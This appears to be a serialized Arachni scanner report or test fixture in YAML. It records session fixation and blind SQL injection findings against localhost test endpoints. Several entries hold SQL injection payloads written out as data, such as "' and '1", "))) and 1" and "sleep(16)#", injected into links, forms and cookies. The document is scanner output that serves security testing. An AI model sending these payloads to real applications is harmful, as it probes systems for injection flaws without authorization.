c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2 Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OyBkb21h aW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5 name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: [] internal_modname: SessionFixation internal_modname: SessionFixation - !ruby/object:Arachni::Issue verification: false references: OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation var: input url: http://localhost:12180/link/straight?input=default elem: link method: GET name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: - !ruby/object:Arachni::Issue verification: false references: OWASP - Session fixation: hhttps://www.owasp.org/index.php/Session_fixation opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :follow_location: true :injected: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :combo: !binary "aW5wdXQ=": _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :action: http://localhost:12180/link/straight?input=default :regexp: '' var: input url: http://localhost:12180/link/straight?input=default injected: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 id: regexp: '' regexp_match: elem: link 
remarks: :stuff: - Blah - Blah2 method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: blah=blah1;blah2=blah2;session=blah response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MA== !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary "U2V0LUNvb2tpZQ==": !binary |- c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2 Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OyBkb21h aW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5 name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: [] internal_modname: SessionFixation internal_modname: SessionFixation - !ruby/object:Arachni::Issue verification: false references: OWASP - Session fixation: https://www.owasp.org/index.php/Session_fixation var: input url: http://localhost:12180/link/append?input=default elem: link method: GET name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. 
tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: - !ruby/object:Arachni::Issue verification: false references: OWASP - Session fixation: https://www.owasp.org/index.php/Session_fixation opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :injected_orig: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :follow_location: true :injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :combo: !binary "aW5wdXQ=": default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 :action: http://localhost:12180/link/append?input=default :regexp: '' var: input url: http://localhost:12180/link/append?input=default injected: default_arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: _arachni_sf_95f9f8f08f6f379242d7ada86cae19685ca38e5f3e4228d7bcd245758d5b9c59 headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: blah=blah1;blah2=blah2;session=blah response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- NzY= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoxOCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== !binary 
"U2V0LUNvb2tpZQ==": !binary |- c2Vzc2lvbj1fYXJhY2huaV9zZl85NWY5ZjhmMDhmNmYzNzkyNDJkN2FkYTg2 Y2FlMTk2ODVjYTM4ZTVmM2U0MjI4ZDdiY2QyNDU3NThkNWI5YzU5OyBkb21h aW49bG9jYWxob3N0OyBwYXRoPS87IEh0dHBPbmx5 name: Session fixation description: The web application allows the session ID to be fixed by a 3rd party. tags: - session - cookie - injection - fixation - hijacking cwe: '384' cwe_url: http://cwe.mitre.org/data/definitions/384.html severity: High mod_name: Session fixation variations: [] internal_modname: SessionFixation internal_modname: SessionFixation - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:11824/form/append?input=default'+and+'1 elem: form method: GET name: Blind SQL Injection (differential analysis) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages." tags: - sql - blind - rdiff - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL Injection (differential analysis) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :var: !binary |- aW5wdXQ= :opts: :injected_orig: !binary |- JyBhbmQgJzE= :combo: !binary "aW5wdXQ=": default' and '1 :injected: !binary |- JyBhbmQgJzE= :id: !binary |- JyBhbmQgJzE= :elem: form :regexp: '' var: input url: http://localhost:11824/form/append?input=default'+and+'1 injected: ! ''' and ''1' id: ! 
''' and ''1' regexp: '' regexp_match: elem: form remarks: {} method: GET response: ! '1 item found: Blah blah blah...' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoyMCBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Blind SQL Injection (differential analysis) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages." tags: - sql - blind - rdiff - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL Injection (differential analysis) variations: [] internal_modname: BlindrDiffSQLInjection internal_modname: BlindrDiffSQLInjection - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:11824/link/append?input=default)))+and+1 elem: link method: GET name: Blind SQL Injection (differential analysis) description: ! 
"SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages." tags: - sql - blind - rdiff - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL Injection (differential analysis) variations: - !ruby/object:Arachni::Issue verification: true references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :var: !binary |- aW5wdXQ= :opts: :injected_orig: !binary |- KSkpIGFuZCAx :combo: !binary "aW5wdXQ=": default))) and 1 :injected: !binary |- KSkpIGFuZCAx :id: !binary |- KSkpIGFuZCAx :elem: link :regexp: '' var: input url: http://localhost:11824/link/append?input=default)))+and+1 injected: ))) and 1 id: ))) and 1 regexp: '' regexp_match: elem: link remarks: {} method: GET response: ! '1 item found: Blah blah blah...' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoyMyBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Blind SQL Injection (differential analysis) description: ! 
"SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages." tags: - sql - blind - rdiff - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL Injection (differential analysis) variations: [] internal_modname: BlindrDiffSQLInjection internal_modname: BlindrDiffSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie url: http://localhost:11824/cookie/append elem: cookie method: GET name: Blind SQL Injection (differential analysis) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages." tags: - sql - blind - rdiff - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL Injection (differential analysis) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :var: !binary |- Y29va2ll :opts: :injected_orig: !binary |- IiBhbmQgIjE= :combo: !binary "Y29va2ll": default" and "1 :injected: !binary |- IiBhbmQgIjE= :id: !binary |- IiBhbmQgIjE= :elem: cookie :regexp: '' var: cookie url: http://localhost:11824/cookie/append injected: ! '" and "1' id: ! '" and "1' regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: ! '1 item found: Blah blah blah...' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=default"+and+"1 response: !binary "WC1GcmFtZS1PcHRpb25z": !binary |- U0FNRU9SSUdJTg== !binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |- MTsgbW9kZT1ibG9jaw== !binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |- bm9zbmlmZg== !binary "Q29udGVudC1UeXBl": !binary |- dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg= !binary "Q29udGVudC1MZW5ndGg=": !binary |- MzE= !binary "U2VydmVy": !binary |- V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ== !binary "RGF0ZQ==": !binary |- TW9uLCAxMSBGZWIgMjAxMyAwMjoyNzoyNSBHTVQ= !binary "Q29ubmVjdGlvbg==": !binary |- S2VlcC1BbGl2ZQ== name: Blind SQL Injection (differential analysis) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages." tags: - sql - blind - rdiff - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL Injection (differential analysis) variations: [] internal_modname: BlindrDiffSQLInjection internal_modname: BlindrDiffSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mysql/form/straight elem: form method: POST name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": sleep(16)# :follow_location: true :injected: sleep(16)# :combo: !binary "aW5wdXQ=": sleep(16)# :action: http://localhost:12482/mysql/form/straight :silent: true :regexp: '' var: input url: http://localhost:12482/mysql/form/straight injected: sleep(16)# id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mysql/form/append elem: form method: POST name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: !binary |- aW5wdXQ= :element: form :params: !binary "aW5wdXQ=": defaultsleep(16)# :follow_location: true :injected: defaultsleep(16)# :combo: !binary "aW5wdXQ=": defaultsleep(16)# :action: http://localhost:12482/mysql/form/append :silent: true :regexp: '' var: input url: http://localhost:12482/mysql/form/append injected: defaultsleep(16)# id: regexp: '' regexp_match: elem: form remarks: {} method: POST response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=cookie+value;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mysql/link/straight?input=default elem: link method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": sleep(16)# :follow_location: true :injected: sleep(16)# :combo: !binary "aW5wdXQ=": sleep(16)# :action: http://localhost:12482/mysql/link/straight?input=default :silent: true :regexp: '' var: input url: http://localhost:12482/mysql/link/straight?input=default injected: sleep(16)# id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: input url: http://localhost:12482/mysql/link/append?input=default elem: link method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: !binary |- aW5wdXQ= :element: link :params: !binary "aW5wdXQ=": defaultsleep(16)# :follow_location: true :injected: defaultsleep(16)# :combo: !binary "aW5wdXQ=": defaultsleep(16)# :action: http://localhost:12482/mysql/link/append?input=default :silent: true :regexp: '' var: input url: http://localhost:12482/mysql/link/append?input=default injected: defaultsleep(16)# id: regexp: '' regexp_match: elem: link remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie2=cookie+value;cookie=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie url: http://localhost:12482/mysql/cookie/straight elem: cookie method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: !binary |- Y29va2ll :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2ll": sleep(16)# :injected: sleep(16)# :combo: !binary "Y29va2ll": sleep(16)# :action: http://localhost:12482/mysql/cookie/straight :silent: true :regexp: '' var: cookie url: http://localhost:12482/mysql/cookie/straight injected: sleep(16)# id: regexp: '' regexp_match: elem: cookie remarks: {} method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev Cookie: cookie=sleep(16)#;cookie2=cookie+value response: {} name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n \ Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: [] internal_modname: BlindTimingSQLInjection internal_modname: BlindTimingSQLInjection - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html var: cookie2 url: http://localhost:12482/mysql/cookie/append elem: cookie method: GET name: Blind SQL Injection (timing attack) description: ! "SQL code can be injected into the web application\n even though it may not be obvious due to suppression of error messages.\n (This issue was discovered using a timing attack; timing attacks\n can result in false positives in cases where the server takes\n an abnormally long time to respond.\n Either case, these issues will require further investigation\n even if they are false positives.)" tags: - sql - blind - timing - injection - database cwe: '89' cwe_url: http://cwe.mitre.org/data/definitions/89.html severity: High cvssv2: '9.0' remedy_guidance: ! "Suppression of error messages leads to\n security through obscurity which is not a good practise.\n The web application needs to enforce stronger validation\n on user inputs." 
remedy_code: '' metasploitable: unix/webapp/arachni_sqlmap mod_name: Blind SQL injection (timing attack) variations: - !ruby/object:Arachni::Issue verification: false references: OWASP: http://www.owasp.org/index.php/Blind_SQL_Injection MITRE - CAPEC: http://capec.mitre.org/data/definitions/7.html opts: :redundant: false :async: true :elements: - link - form - cookie - header - body :train: :format: - 1 - 2 :timeout: 11200.0 :timeout_divider: 1000 :timing_string: !binary |- c2xlZXAoX19USU1FX18pIw== :skip_orig: true :injected_orig: !binary |- c2xlZXAoMTYpIw== :altered: !binary |- Y29va2llMg== :element: cookie :params: {} :follow_location: true :cookies: !binary "Y29va2llMg==": cookie valuesleep(16)# :injected: cookie valuesleep(16)# :combo: !binary "Y29va2llMg==": cookie valuesleep(16)# :action: http://localhost:12482/mysql/cookie/append :silent: true :regexp: '' var: cookie2 url: http://localhost:12482/mysql/cookie/append injected: cookie valuesleep(16)# id: regexp: '' regexp_match: elem: cookie remarks: :stuff: - Blah - Blah2 method: GET response: '' headers: request: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 User-Agent: Arachni/v1.0dev 